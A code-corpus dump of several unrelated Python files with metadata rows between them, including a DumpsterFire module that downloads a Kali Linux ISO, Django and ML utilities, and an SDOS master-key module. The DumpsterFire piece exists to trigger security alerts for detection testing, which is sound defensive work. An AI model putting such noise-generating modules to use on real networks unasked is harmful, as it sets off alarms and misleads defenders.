# Part of the DumpsterFire Toolset. See documentation at https://github.com/TryCatchHCF/DumpsterFire
#
#
# Description:
#
#
# Example:
#
#
import os, sys, urllib
from FireModules.fire_module_base_class import *
class download_kali( FireModule ):
def __init__(self):
self.commentsStr = "FileDownloads/download_kali"
def __init__(self, moofStr):
self.moofStr = moofStr
self.commentsStr = "FileDownloads/download_kali"
return;
def Description( self ):
self.Description = "Downloads Kali distro to local directory"
return self.Description
def Configure( self ):
self.mDirectoryPath = raw_input( "Enter Directory Path to download files into: " )
return
def GetParameters( self ):
return self.mDirectoryPath
def SetParameters( self, parametersStr ):
self.mDirectoryPath = parametersStr
return
def ActivateLogging( self, logFlag ):
print self.commentsStr + ": Setting Logging flag!"
print logFlag
return
def Ignite( self ):
self.filepath = self.mDirectoryPath + "/" + 'kali.iso'
print self.commentsStr + ": Downloading Kali to: " + self.filepath
urllib.urlretrieve( 'http://cdimage.kali.org/kali-2017.2/kali-linux-2017.2-amd64.iso', self.filepath )
return
| mit | -2,891,286,367,684,792,000 | 20.193548 | 104 | 0.713851 | false | 3.041667 | false | false | false |
sternoru/goscalecms | setup.py | 1 | 1601 | import os
import imp
try:
imp.find_module('setuptools')
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
README = open('README.rst').read()
setup(
name = "goscalecms",
version = __import__('goscale').__version__,
packages = find_packages(),
author = "Evgeny Demchenko",
author_email = "[email protected]",
description = "GoScale CMS is an extension of Django CMS. It's a set of unique plugins and useful tools for Django CMS that makes it very powerful by seamlessly integrating content from 3rd party websites to make mashups.",
long_description = README,
license = "BSD",
keywords = "goscale cms django themes content management system mashup google ajax",
url = "https://github.com/sternoru/goscalecms",
include_package_data = True,
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Internet :: WWW/HTTP :: Site Management",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"Natural Language :: English",
"Natural Language :: French",
"Natural Language :: Russian",
"Programming Language :: Python",
"Programming Language :: JavaScript",
"License :: OSI Approved :: BSD License",
],
install_requires = [
"pytz",
"unidecode",
"BeautifulSoup",
"feedparser",
"gdata",
"python-dateutil",
"simplejson",
"Django>=1.4,<1.6",
"django-cms==2.4",
]
)
| bsd-3-clause | -6,431,777,091,402,744,000 | 31.02 | 227 | 0.620862 | false | 4.042929 | false | false | false |
mlperf/inference_results_v0.7 | open/Inspur/code/ssd-resnet34/tensorrt/infer.py | 12 | 5389 | #!/usr/bin/env python3
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ctypes
import os, sys
# The plugin .so file has to be loaded at global scope and before `import torch` to avoid cuda version mismatch.
NMS_OPT_PLUGIN_LIBRARY="build/plugins/NMSOptPlugin/libnmsoptplugin.so"
if not os.path.isfile(NMS_OPT_PLUGIN_LIBRARY):
raise IOError("{}\n{}\n".format(
"Failed to load library ({}).".format(NMS_OPT_PLUGIN_LIBRARY),
"Please build the NMS Opt plugin."
))
ctypes.CDLL(NMS_OPT_PLUGIN_LIBRARY)
import argparse
import json
import time
sys.path.insert(0, os.getcwd())
from code.common.runner import EngineRunner, get_input_format
from code.common import logging
import code.common.arguments as common_args
import numpy as np
import torch
import tensorrt as trt
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
def run_SSDResNet34_accuracy(engine_file, batch_size, num_images, verbose=False, output_file="build/out/SSDResNet34/dump.json"):
threshold = 0.20
runner = EngineRunner(engine_file, verbose=verbose)
input_dtype, input_format = get_input_format(runner.engine)
if input_dtype == trt.DataType.FLOAT:
format_string = "fp32"
elif input_dtype == trt.DataType.INT8:
if input_format == trt.TensorFormat.LINEAR:
format_string = "int8_linear"
elif input_format == trt.TensorFormat.CHW4:
format_string = "int8_chw4"
image_dir = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"),
"coco/val2017/SSDResNet34", format_string)
val_annotate = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"),
"coco/annotations/instances_val2017.json")
coco = COCO(annotation_file=val_annotate)
image_ids = coco.getImgIds()
cat_ids = coco.getCatIds()
# Class 0 is background
cat_ids.insert(0, 0)
num_images = min(num_images, len(image_ids))
logging.info("Running validation on {:} images. Please wait...".format(num_images))
coco_detections = []
batch_idx = 0
for image_idx in range(0, num_images, batch_size):
end_idx = min(image_idx + batch_size, num_images)
img = []
img_sizes = []
for idx in range(image_idx, end_idx):
image_id = image_ids[idx]
img.append(np.load(os.path.join(image_dir, coco.imgs[image_id]["file_name"] + ".npy")))
img_sizes.append([coco.imgs[image_id]["height"], coco.imgs[image_id]["width"]])
img = np.stack(img)
start_time = time.time()
outputs = runner([img], batch_size=batch_size)
trt_detections = outputs[0]
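        # Layout assumed for the NMS plugin output (inferred from the indexing below):
        # each image owns a flat block of 200*7+1 floats -- up to 200 detections of
        # [?, ymin, xmin, ymax, xmax, score, label] followed by the kept-detection count.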
if verbose:
logging.info("Batch {:d} >> Inference time: {:f}".format(batch_idx, time.time() - start_time))
for idx in range(0, end_idx - image_idx):
keep_count = trt_detections[idx * (200 * 7 + 1) + 200 * 7].view('int32')
trt_detections_batch = trt_detections[idx * (200 * 7 + 1):idx * (200 * 7 + 1) + keep_count * 7].reshape(keep_count, 7)
image_height = img_sizes[idx][0]
image_width = img_sizes[idx][1]
for prediction_idx in range(0, keep_count):
loc = trt_detections_batch[prediction_idx, [2, 1, 4, 3]]
label = trt_detections_batch[prediction_idx, 6]
score = float(trt_detections_batch[prediction_idx, 5])
bbox_coco_fmt = [
loc[0] * image_width,
loc[1] * image_height,
(loc[2] - loc[0]) * image_width,
(loc[3] - loc[1]) * image_height,
]
coco_detection = {
"image_id": image_ids[image_idx + idx],
"category_id": cat_ids[int(label)],
"bbox": bbox_coco_fmt,
"score": score,
}
coco_detections.append(coco_detection)
batch_idx += 1
output_dir = os.path.dirname(output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(output_file, "w") as f:
json.dump(coco_detections, f)
cocoDt = coco.loadRes(output_file)
eval = COCOeval(coco, cocoDt, 'bbox')
eval.params.imgIds = image_ids[:num_images]
eval.evaluate()
eval.accumulate()
eval.summarize()
map_score = eval.stats[0]
logging.info("Get mAP score = {:f} Target = {:f}".format(map_score, threshold))
return (map_score >= threshold * 0.99)
def main():
args = common_args.parse_args(common_args.ACCURACY_ARGS)
logging.info("Running accuracy test...")
run_SSDResNet34_accuracy(args["engine_file"], args["batch_size"], args["num_samples"],
verbose=args["verbose"])
if __name__ == "__main__":
main()
| apache-2.0 | 930,155,146,158,092,900 | 36.685315 | 130 | 0.62442 | false | 3.345127 | false | false | false |
pydanny/django-admin2 | example/files/migrations/0001_initial.py | 2 | 1262 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='CaptionedFile',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('caption', models.CharField(max_length=200, verbose_name='caption')),
('publication', models.FileField(verbose_name='Uploaded File', upload_to='captioned-files')),
],
options={
'verbose_name': 'Captioned File',
'verbose_name_plural': 'Captioned Files',
},
),
migrations.CreateModel(
name='UncaptionedFile',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('publication', models.FileField(verbose_name='Uploaded File', upload_to='uncaptioned-files')),
],
options={
'verbose_name': 'Uncaptioned File',
'verbose_name_plural': 'Uncaptioned Files',
},
),
]
| bsd-3-clause | -9,021,473,371,332,954,000 | 34.055556 | 114 | 0.546751 | false | 4.539568 | false | false | false |
indhub/mxnet | python/mxnet/torch.py | 11 | 6714 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
"""Interface for NDArray functions executed by torch backend.
Install Torch and compile with USE_TORCH=1 to use this module."""
from __future__ import absolute_import
import ctypes
import sys
from .base import _LIB
from .base import c_array, c_str_array, c_handle_array, py_str, build_param_doc as _build_param_doc
from .base import mx_uint, mx_float, FunctionHandle
from .base import check_call
from .ndarray import NDArray, _new_empty_handle
try:
_LUAJIT = ctypes.CDLL("libluajit.so", mode=ctypes.RTLD_GLOBAL)
except OSError:
_LUAJIT = None
# pylint: disable=too-many-locals, invalid-name
def _make_torch_function(handle):
"""Create a Torch function from the FunctionHandle."""
# Get the property of function
n_used_vars = mx_uint()
n_scalars = mx_uint()
n_mutate_vars = mx_uint()
type_mask = ctypes.c_int()
check_call(_LIB.MXFuncDescribe(
handle,
ctypes.byref(n_used_vars),
ctypes.byref(n_scalars),
ctypes.byref(n_mutate_vars),
ctypes.byref(type_mask)))
n_mutate_vars = n_mutate_vars.value
n_used_vars = n_used_vars.value
n_scalars = n_scalars.value
type_mask = type_mask.value
# Get the information from the function
name = ctypes.c_char_p()
desc = ctypes.c_char_p()
num_args = mx_uint()
arg_names = ctypes.POINTER(ctypes.c_char_p)()
arg_types = ctypes.POINTER(ctypes.c_char_p)()
arg_descs = ctypes.POINTER(ctypes.c_char_p)()
ret_type = ctypes.c_char_p()
check_call(_LIB.MXFuncGetInfo(
handle, ctypes.byref(name), ctypes.byref(desc),
ctypes.byref(num_args),
ctypes.byref(arg_names),
ctypes.byref(arg_types),
ctypes.byref(arg_descs),
ctypes.byref(ret_type)))
func_name = py_str(name.value)
if not func_name.startswith('_th_'):
return None
narg = int(num_args.value)
param_str = _build_param_doc(
[py_str(arg_names[i]) for i in range(narg)],
[py_str(arg_types[i]) for i in range(narg)],
[py_str(arg_descs[i]) for i in range(narg)])
if n_mutate_vars > 1:
res = ','.join(['res%d '%i for i in range(n_mutate_vars)])
else:
res = 'res '
doc_str = (('Interface for Torch function {name}.\n' +
'Invoke with\n{res}= mxnet.th.{name}(Parameters)\nor\n'+
'mxnet.th.{name}({res}, Parameters).\n\n' +
'{param_str}\n' +
'Reference: ' +
'https://github.com/torch/torch7/blob/master/doc/maths.md\n').format(
name=func_name[4:], param_str=param_str,
res=res))
def generic_torch_function(*args, **kwargs):
"""Invoke this function by passing in parameters.
Parameters
----------
*args
Positional arguments of inputs (both scalar and `NDArray`).
Returns
-------
out : NDArray
The result NDArray(tuple) of result of computation.
"""
ndargs = []
arg_format = ''
value = ''
for arg in args:
if isinstance(arg, NDArray):
ndargs.append(arg)
arg_format += 'n'
value += ','
elif isinstance(arg, int):
arg_format += 'i'
value += str(arg) + ','
elif isinstance(arg, str):
arg_format += 's'
value += str(arg) + ','
elif isinstance(arg, float):
arg_format += 'f'
value += str(arg) + ','
elif isinstance(arg, bool):
arg_format += 'b'
value += str(arg) + ','
value = value[:-1]
if len(ndargs) == n_used_vars:
ndargs = [NDArray(_new_empty_handle()) for _ in range(n_mutate_vars)] + ndargs
arg_format = 'n'*n_mutate_vars + arg_format
value = ','*n_mutate_vars + value
elif len(ndargs) == n_mutate_vars + n_used_vars:
pass
else:
raise AssertionError(('Incorrect number of input NDArrays. ' +
'Need to be either %d (inputs) or %d ' +
'(output buffer) + %d (input)') %
(n_used_vars, n_mutate_vars, n_used_vars))
kwargs['format'] = arg_format
kwargs['args'] = value
for k in kwargs:
kwargs[k] = str(kwargs[k])
check_call(_LIB.MXFuncInvokeEx(
handle,
c_handle_array(ndargs[n_mutate_vars:]), # pylint: disable=invalid-slice-index
c_array(mx_float, []),
c_handle_array(ndargs[:n_mutate_vars]), # pylint: disable=invalid-slice-index
ctypes.c_int(len(kwargs)),
c_str_array(kwargs.keys()),
c_str_array(kwargs.values())))
if n_mutate_vars == 1:
return ndargs[0]
else:
return ndargs[:n_mutate_vars] # pylint: disable=invalid-slice-index
# End of function declaration
ret_function = generic_torch_function
ret_function.__name__ = func_name[4:]
ret_function.__doc__ = doc_str
return ret_function
# pylint: enable=too-many-locals, invalid-name
def _init_torch_module():
"""List and add all the torch backed ndarray functions to current module."""
plist = ctypes.POINTER(FunctionHandle)()
size = ctypes.c_uint()
check_call(_LIB.MXListFunctions(ctypes.byref(size),
ctypes.byref(plist)))
module_obj = sys.modules[__name__]
for i in range(size.value):
hdl = FunctionHandle(plist[i])
function = _make_torch_function(hdl)
# if function name starts with underscore, register as static method of NDArray
if function is not None:
setattr(module_obj, function.__name__, function)
# Initialize the NDArray module
_init_torch_module()
| apache-2.0 | -7,899,274,321,398,590,000 | 35.688525 | 99 | 0.584748 | false | 3.691039 | false | false | false |
timwaizenegger/osecm-sdos | mcm/sdos/core/MasterKeySource.py | 2 | 15616 | #!/usr/bin/python
# coding=utf-8
"""
Project MCM - Micro Content Management
SDOS - Secure Delete Object Store
Copyright (C) <2017> Tim Waizenegger, <University of Stuttgart>
This software may be modified and distributed under the terms
of the MIT license. See the LICENSE file for details.
"""
import io
import logging
from swiftclient import ClientException
from sdos.crypto import CryptoLib
from sdos.crypto.DataCrypt import DataCrypt
OUTERHEADER = 'SDOS_MKEY_V1\0\0\0\0'.encode(encoding='utf_8', errors='strict') # should be 16 bytes long
KEYOBJNAME = 'masterkey.sdos'
###############################################################################
###############################################################################
# factory
###############################################################################
###############################################################################
def masterKeySourceFactory(swiftBackend, keysource_type, container_name_mgmt, tpm_key_id=None):
"""
    select and initialize one of the key sources
:param swiftBackend:
:param keysource_type:
:param container_name_mgmt:
:param tpm_key_id:
:return:
"""
if keysource_type == MasterKeyDummy.my_key_type:
return MasterKeyDummy()
elif keysource_type == MasterKeyStatic.my_key_type:
return MasterKeyStatic(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt)
elif keysource_type == MasterKeyPassphrase.my_key_type:
return MasterKeyPassphrase(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt)
elif keysource_type == MasterKeyTPM.my_key_type:
return MasterKeyTPM(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt, tpm_key_id=tpm_key_id)
else:
raise TypeError("could not create master key source. type missing or wrong: {}".format(keysource_type))
###############################################################################
###############################################################################
# master key load/store
###############################################################################
###############################################################################
def load_wrapped_key(containerNameSdosMgmt, swiftBackend):
logging.info("loading the wrapped master key from {}".format(containerNameSdosMgmt))
try:
obj = swiftBackend.getObject(container=containerNameSdosMgmt, name=KEYOBJNAME)
except ClientException:
logging.warning('master key obj was not found in swift container {}'.format(containerNameSdosMgmt))
return None
mkh = obj.read(len(OUTERHEADER))
if not mkh == OUTERHEADER:
raise TypeError('file header mismatch on master key obj for container {}'.format(containerNameSdosMgmt))
by = io.BytesIO(obj.read())
obj.close()
return by
def store_wrapped_key(containerNameSdosMgmt, swiftBackend, wrapped_key):
logging.info("writing the wrapped master key to {}".format(containerNameSdosMgmt))
obj = OUTERHEADER + wrapped_key.getbuffer()
swiftBackend.putObject(container=containerNameSdosMgmt, name=KEYOBJNAME, dataObject=obj)
logging.debug('wrote master key to swift mgmt container {}'.format(containerNameSdosMgmt))
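# On-store layout of the key object (as written above): the 16-byte OUTERHEADER magic,
# followed by the DataCrypt-wrapped master key, saved as KEYOBJNAME in the mgmt container.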
###############################################################################
###############################################################################
# dummy key source
# a random key each time. no back end requests, key is only in memory during run
###############################################################################
###############################################################################
class MasterKeyDummy(object):
my_key_type = "dummy"
def __init__(self):
self.swiftBackend=None
self.get_new_key_and_replace_current()
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
return self.plainMasterKey
# return CryptoLib.digestKeyString("hallo")
def get_new_key_and_replace_current(self):
self.plainMasterKey = CryptoLib.generateRandomKey()
self.plainMasterKeyBackup = self.plainMasterKey
return self.plainMasterKey
# return CryptoLib.digestKeyString("hallo")
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': True
}
def clear_next_deletable(self):
pass
def provide_next_deletable(self, passphrase):
pass
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase=None):
self.plainMasterKey = self.plainMasterKeyBackup
###############################################################################
###############################################################################
# static key source
# a static, hard-coded master key for testing/development
###############################################################################
###############################################################################
class MasterKeyStatic(object):
STATIC_KEY = CryptoLib.digestKeyString('ALWAYS_THE_SAME')
my_key_type = "static"
def __init__(self, swiftBackend, container_name_mgmt):
self.containerNameSdosMgmt = container_name_mgmt
self.swiftBackend = swiftBackend
self.plainMasterKey = None
try:
self.unlock_key()
except:
logging.error("unlocking master key failed for {}! Key source is not ready...".format(
self.containerNameSdosMgmt))
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
if not self.plainMasterKey:
raise KeyError("Master key is not available")
return self.plainMasterKey
def get_new_key_and_replace_current(self):
new_master = CryptoLib.generateRandomKey()
self.plainMasterKey = new_master
dc = DataCrypt(self.STATIC_KEY)
wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master))
store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
wrapped_key=wrapped_key)
return self.plainMasterKey
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': True
}
def clear_next_deletable(self):
pass
def provide_next_deletable(self, passphrase):
pass
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase=None):
logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt))
by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
if not by:
logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
self.containerNameSdosMgmt))
self.get_new_key_and_replace_current()
return
try:
dc = DataCrypt(self.STATIC_KEY)
plain = dc.decryptBytesIO(by)
self.plainMasterKey = plain.read()
except:
raise KeyError("Failed decrypting master key")
###############################################################################
###############################################################################
# passphrase key source
# use a pass phrase as deletable key. the master key will be encrypted with a different
# password each time.
###############################################################################
###############################################################################
class MasterKeyPassphrase(object):
my_key_type = "passphrase"
def __init__(self, swiftBackend, container_name_mgmt):
self.containerNameSdosMgmt = container_name_mgmt
self.swiftBackend = swiftBackend
self.plainMasterKey = None
self.next_deletable = None
logging.error("Passphrase key source initialized for {}. ... set the passphrase to unlock".format(
self.containerNameSdosMgmt))
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
if not self.plainMasterKey:
raise KeyError("Master key is not available")
return self.plainMasterKey
def get_new_key_and_replace_current(self, first_run=False):
if not self.next_deletable:
raise KeyError("can't replace current master key without new wrapping (deletable) key")
if not first_run and not self.plainMasterKey:
raise KeyError("not allowed while current master is locked")
new_master = CryptoLib.generateRandomKey()
self.plainMasterKey = new_master
dc = DataCrypt(self.next_deletable)
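            # the wrapping (deletable) key is single-use: discard it once consumed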
self.next_deletable = None
wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master))
store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
wrapped_key=wrapped_key)
return self.plainMasterKey
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': bool(self.next_deletable)
}
def clear_next_deletable(self):
self.next_deletable = None
def provide_next_deletable(self, passphrase):
nd = CryptoLib.digestKeyString(passphrase)
if not nd:
raise KeyError("could not digest the provided passphrase")
self.next_deletable = nd
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase):
logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt))
by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
if not by:
logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
self.containerNameSdosMgmt))
self.provide_next_deletable(passphrase)
self.get_new_key_and_replace_current(first_run=True)
return
try:
dc = DataCrypt(CryptoLib.digestKeyString(passphrase))
plain = dc.decryptBytesIO(by)
self.plainMasterKey = plain.read()
except:
raise KeyError("wrong passphrase. Failed decrypting master key")
###############################################################################
###############################################################################
# tpm key source
# use a tpm key as deletable key. the master key will be encrypted with a different
# tpm-bound, non-migratable key inside the TPM
###############################################################################
###############################################################################
class MasterKeyTPM(object):
my_key_type = "tpm"
def __init__(self, swiftBackend, container_name_mgmt, tpm_key_id):
self.containerNameSdosMgmt = container_name_mgmt
self.swiftBackend = swiftBackend
self.plainMasterKey = None
self.keyId = tpm_key_id
assert (self.keyId > 0)
try:
from sdos.util.tpmLib import TpmLib
self.tpm = TpmLib()
except ImportError:
logging.exception("unable to import TPM lib, TPM functions will not be available")
self.tpm = None
try:
self.unlock_key()
except:
logging.exception("unlocking master key failed for {}! Key source is not ready...".format(
self.containerNameSdosMgmt))
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
if not self.plainMasterKey:
raise KeyError("Master key is not available")
return self.plainMasterKey
def get_new_key_and_replace_current(self, first_run=False):
# if not self.next_deletable:
# raise KeyError("can't replace current master key without new wrapping (deletable) key")
if not first_run and not self.plainMasterKey:
raise KeyError("not allowed while current master is locked")
new_master = CryptoLib.generateRandomKey()
next_deletable = self.tpm.get_new_key_and_replace_current(self.keyId, first_run=first_run)
wrapped_key = io.BytesIO(next_deletable.bind(new_master))
# TODO ADD key id to store_wrapped_key?
store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
wrapped_key=wrapped_key)
self.plainMasterKey = new_master
return self.plainMasterKey
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': True
}
def clear_next_deletable(self):
pass
def provide_next_deletable(self):
pass
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase=None):
logging.info("unlocking the TPM backed master key from {}".format(self.containerNameSdosMgmt))
by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
if not by:
logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
self.containerNameSdosMgmt))
self.get_new_key_and_replace_current(first_run=True)
return
try:
deletable = self.tpm.get_current_key(self.keyId)
self.plainMasterKey = bytes(deletable.unbind(by.read()))
except:
raise KeyError("TPM Error. Failed decrypting master key")
| mit | 7,323,551,077,043,263,000 | 41.434783 | 118 | 0.524974 | false | 4.71213 | false | false | false |
ahmedsalman/django-autotranslate | autotranslate/management/commands/translate_messages.py | 1 | 8592 | import logging
import os
import re
from optparse import make_option
import polib
from django.conf import settings
from django.core.management.base import BaseCommand
from autotranslate.utils import translate_strings
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = ('autotranslate all the message files that have been generated '
'using the `makemessages` command.')
option_list = BaseCommand.option_list + (
make_option('--locale', '-l', default=[], dest='locale', action='append',
help='autotranslate the message files for the given locale(s) (e.g. pt_BR). '
'can be used multiple times.'),
make_option('--untranslated', '-u', default=False, dest='skip_translated', action='store_true',
help='autotranslate the fuzzy and empty messages only.'),
make_option('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true',
help='set the fuzzy flag on autotranslated messages.'),
)
def add_arguments(self, parser):
# Previously, only the standard optparse library was supported and
# you would have to extend the command option_list variable with optparse.make_option().
# See: https://docs.djangoproject.com/en/1.8/howto/custom-management-commands/#accepting-optional-arguments
# In django 1.8, these custom options can be added in the add_arguments()
parser.add_argument('--locale', '-l', default=[], dest='locale', action='append',
help='autotranslate the message files for the given locale(s) (e.g. pt_BR). '
'can be used multiple times.')
parser.add_argument('--untranslated', '-u', default=False, dest='skip_translated', action='store_true',
help='autotranslate the fuzzy and empty messages only.')
parser.add_argument('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true',
help='set the fuzzy flag on autotranslated messages.')
def set_options(self, **options):
self.locale = options['locale']
self.skip_translated = options['skip_translated']
self.set_fuzzy = options['set_fuzzy']
def handle(self, *args, **options):
self.set_options(**options)
assert getattr(settings, 'USE_I18N', False), 'i18n framework is disabled'
assert getattr(settings, 'LOCALE_PATHS', []), 'locale paths is not configured properly'
for directory in settings.LOCALE_PATHS:
# walk through all the paths
# and find all the pot files
for root, dirs, files in os.walk(directory):
for file in files:
if not file.endswith('.po'):
                        # only process .po message files
continue
# get the target language from the parent folder name
target_language = os.path.basename(os.path.dirname(root))
if self.locale and target_language not in self.locale:
logger.info('skipping translation for locale `{}`'.format(target_language))
continue
self.translate_file(root, file, target_language)
def translate_file(self, root, file_name, target_language):
"""
        convenience method for translating a po file
        :param root: the absolute path of folder where the file is present
        :param file_name: name of the file to be translated (it should be a po file)
:param target_language: language in which the file needs to be translated
"""
logger.info('filling up translations for locale `{}`'.format(target_language))
po = polib.pofile(os.path.join(root, file_name))
strings = self.get_strings_to_translate(po)
# translate the strings,
# all the translated strings are returned
# in the same order on the same index
# viz. [a, b] -> [trans_a, trans_b]
translated_strings = translate_strings(strings, target_language, 'en', False)
self.update_translations(po, translated_strings)
po.save()
    def need_translate(self, entry):
        # with --untranslated, only fuzzy/empty entries are (re)translated;
        # otherwise every entry is translated
        return not self.skip_translated or not entry.translated()
def get_strings_to_translate(self, po):
"""Return list of string to translate from po file.
:param po: POFile object to translate
:type po: polib.POFile
:return: list of string to translate
:rtype: collections.Iterable[six.text_type]
"""
strings = []
for index, entry in enumerate(po):
if not self.need_translate(entry):
continue
strings.append(humanize_placeholders(entry.msgid))
if entry.msgid_plural:
strings.append(humanize_placeholders(entry.msgid_plural))
return strings
def update_translations(self, entries, translated_strings):
"""Update translations in entries.
The order and number of translations should match to get_strings_to_translate() result.
:param entries: list of entries to translate
:type entries: collections.Iterable[polib.POEntry] | polib.POFile
:param translated_strings: list of translations
:type translated_strings: collections.Iterable[six.text_type]
"""
translations = iter(translated_strings)
for entry in entries:
if not self.need_translate(entry):
continue
if entry.msgid_plural:
# fill the first plural form with the entry.msgid translation
translation = next(translations)
translation = fix_translation(entry.msgid, translation)
entry.msgstr_plural[0] = translation
# fill the rest of plural forms with the entry.msgid_plural translation
translation = next(translations)
translation = fix_translation(entry.msgid_plural, translation)
for k, v in entry.msgstr_plural.items():
if k != 0:
entry.msgstr_plural[k] = translation
else:
translation = next(translations)
translation = fix_translation(entry.msgid, translation)
entry.msgstr = translation
# Set the 'fuzzy' flag on translation
if self.set_fuzzy and 'fuzzy' not in entry.flags:
entry.flags.append('fuzzy')
def humanize_placeholders(msgid):
"""Convert placeholders to the (google translate) service friendly form.
%(name)s -> __name__
%s -> __item__
%d -> __number__
"""
# return re.sub(
# r'%(?:\((\w+)\))?([sd])',
# lambda match: r'__{0}__'.format(
# match.group(1).lower() if match.group(1) else 'number' if match.group(2) == 'd' else 'item'),
# msgid)
msgid = re.sub(
r'%(?:\(([\w\|\:\.]+)\))?(s)',
lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 's', '[[[[xstr]]]]'),
msgid)
msgid = re.sub(
r'%(?:\(([\w\|\:\.]+)\))?(d)',
lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 'd', '[[[[xnum]]]]'),
msgid)
return msgid
def restore_placeholders(msgid, translation):
"""Restore placeholders in the translated message."""
    placeholders = re.findall(r'(\s*)(%(?:\(\w+\))?[sd])(\s*)', msgid)
    return re.sub(
        r'(\s*)(_____[\w]+?_____)(\s*)',
        lambda matches: '{0}{1}{2}'.format(placeholders[0][0], placeholders[0][1], placeholders.pop(0)[2]),
        translation)
def fix_translation(msgid, translation):
# Google Translate removes a lot of formatting, these are the fixes:
# - Add newline in the beginning if msgid also has that
if msgid.startswith('\n') and not translation.startswith('\n'):
translation = u'\n' + translation
# - Add newline at the end if msgid also has that
if msgid.endswith('\n') and not translation.endswith('\n'):
translation += u'\n'
# Remove spaces that have been placed between %(id) tags
translation = restore_placeholders(msgid, translation)
return translation
| mit | 3,598,298,534,061,988,000 | 42.393939 | 120 | 0.591597 | false | 4.317588 | false | false | false |
robcarver17/pysystemtrade | sysbrokers/IB/client/ib_client.py | 1 | 3045 | from dateutil.tz import tz
import datetime
from ib_insync import Contract
from ib_insync import IB
from sysbrokers.IB.ib_connection import connectionIB
from syscore.dateutils import strip_timezone_fromdatetime
from syslogdiag.logger import logger
from syslogdiag.log_to_screen import logtoscreen
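# IB pacing limits for historical data requests: at most 60 requests per
# 10 minutes, so successive requests are spaced roughly 11 seconds apart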
_PACING_PERIOD_SECONDS = 10 * 60
_PACING_PERIOD_LIMIT = 60
PACING_INTERVAL_SECONDS = 1 + (_PACING_PERIOD_SECONDS / _PACING_PERIOD_LIMIT)
STALE_SECONDS_ALLOWED_ACCOUNT_SUMMARY = 600
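# IB error codes treated as genuine errors (anything else is relayed as a message);
# each is mapped to an internal error type, e.g. 200 -> invalid contract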
IB_ERROR_TYPES = {200: "invalid_contract"}
